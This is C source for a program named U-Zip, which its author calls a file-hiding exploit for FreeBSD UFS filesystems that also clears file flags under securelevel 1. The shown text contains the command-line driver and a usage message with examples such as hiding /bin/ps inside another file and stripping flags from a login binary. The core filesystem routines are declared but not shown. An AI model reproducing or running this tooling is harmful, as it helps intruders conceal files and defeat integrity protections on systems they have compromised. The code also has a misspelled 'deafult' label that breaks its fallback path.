/*** This program is (C)opyright by Stealth.
 *** You may use it under the terms of the GPL.
 *** So there is ABSOLUTELY NO WARRANTY. You use it at your own risk!
 *** All the sources are provided ''AS IS'' in the hope that
 *** they will be usefull. It's all for educational purposes only!
 *** Neither the author nor the distributor of my programs is responsible
 *** for possible attacks/damages/usage done with this programs or with
 *** the knowledge that such persons gained by reading these sources!!!
 ***/
#define MAXFRAG 8
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <string.h>

#include <ufs/ufs/dinode.h>
#include <ufs/ufs/dir.h>
#include <ufs/ffs/fs.h>

#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <stdlib.h>
#include "fsck.h"

int usage(void);
int ufs_clean_flags(const char *, const char*, const char*);
int ufs_hide_file(const char*, const char*, const char*, const char*);
int ufs_fetch_file(const char*, const char*);
int ufs_hot_remount(const char*, const char*, int);

extern int optind, opterr;
extern char *optarg;
extern int fswritefd, fsreadfd;

char *subopts[] = {
#define FILESYS 0
	"fs",
#define CORRUPTFILE 1
	"corrupt",
#define DATAFILE    2
	"data",  
	NULL
};

enum how {
    NOTHING = 0,
    HIDE,
    FETCH,
    CLEAN
};

#define INTRO "U-Zip 1.1 -- file-hiding exploit for FreeBSD (based on 4.4BSD kernel)\n"\
	      "FileFlagCleaner for securelevel 1 (BSD) included.\n"\
              "(C) 1999/2000 by Stealth -- http://www.kalug.lug.net/stealth\n"\
	      "Under the GPL - so you use it at your own risk.\n"\
	      "\nThis program is year 2000 and BSD compilant. ;->\n"\
	      "uzip -h for help\n\n"

int main(int argc, char **argv)
{
	char *options;
	char fs[1000] = {0}, corruptf[1000] = {0}, dataf[1000] = {0},
	     c, m[1000] = {0};
	enum how what;
	
	puts(INTRO);

	opterr = 0;
	while ((c = getopt(argc, argv, "M:F:c:h:f:")) != -1) {
		switch (c) {
		case 'F':
			strcpy(fs, optarg);
			printf("Using filesystem %s.\n", fs);
			break;
		case 'h':
			options = optarg;
			suboptions(options, corruptf, dataf);		
			what = HIDE;
			break;
		case 'f':
			options = optarg;
			suboptions(options, corruptf, dataf);
			what = FETCH;
			break;
		case 'M':
			strcpy(m, optarg);
			break;
		case 'c':
			strcpy(corruptf, optarg);
			what = CLEAN;
			break;
		deafult:
			usage();
		}
	}
	switch (what) {
	case FETCH:
		printf("Try to UN-corrupt file '%s' to file '%s'.\n", corruptf, dataf);
		ufs_fetch_file(dataf, corruptf);
		break;
	case HIDE:
		printf("Try to corrupt file '%s' with file '%s'.\n", corruptf, dataf);
		ufs_hide_file(dataf, corruptf, m, fs);
		break;
	case CLEAN:
		printf("Try to clean flags from file '%s'.\n", corruptf);
		ufs_clean_flags(corruptf, m, fs);
		break;
	default:
		printf("Huh?\n");
		usage();
	}
	return 0;
}

/*** parse some suboptions
 *** we need the corrupted file and the file containing the data
 ***/
int suboptions(char *options, char *corruptf, char *dataf)
{
	char *value;
	int c = 0, d = 0;
	
	while (*options) {
		switch (getsubopt(&options, subopts, &value)) {
		case CORRUPTFILE:
			if (value)
				strcpy(corruptf, value);
			else {
				printf("missing corruptfile\n");
				usage();
			}
			c++;
			break;
		case DATAFILE:
			if (value)
				strcpy(dataf, value);
			else {
				printf("missing data-file\n");
				usage();
         		}
			d++;
			break;
		default:
			printf("Huh?\n");
			usage();	
		}
	}	
	if (!d || !c) {
		printf("You either forgot to tell me the corruptfile or the datafile!\n");
		usage();
	}
	return 0;
}

int usage()
{

	printf("usage: uzip -F filesystem -[hf] data=datafile,corrupt=corruptfile,\n"
	       "            -M mountpoint -c file\n"		
	       "    where:\n"
	       "		-h is for hiding data-file in corruptfile\n" 
	       "		-f to get datafile back from corruptfile (datafile\n"
	       "		   should NOT exist already in this case!)\n"
	       "		-F necessary to specify the filesystem (i.e. /dev/rfd0\n"
	       "		   for the first disk-drive in your PC)\n\n"
	       "		-M to specify where 'filesystem' is mounted on\n"
	       "		-c for drawing back fileflag to 0 (only works with\n"
	       "                   securelevel < 2)\n\n"
	       " # uzip -F /dev/rfd0 -M /mnt -h data=/bin/ps,corrupt=/mnt/cp\n"
	       "   -- to hide /bin/ps in /mnt/cp\n"
	       " # uzip -f data=./new,corrupt=/mnt/cp\n"
	       "   -- to get the data back\n"
	       " # uzip -F /dev/rfd0 -M /floppy -c /floppy/login\n"
	       "   -- to clean /floppy/login from fileflags\n\n"); 
	        
	exit(0);
}
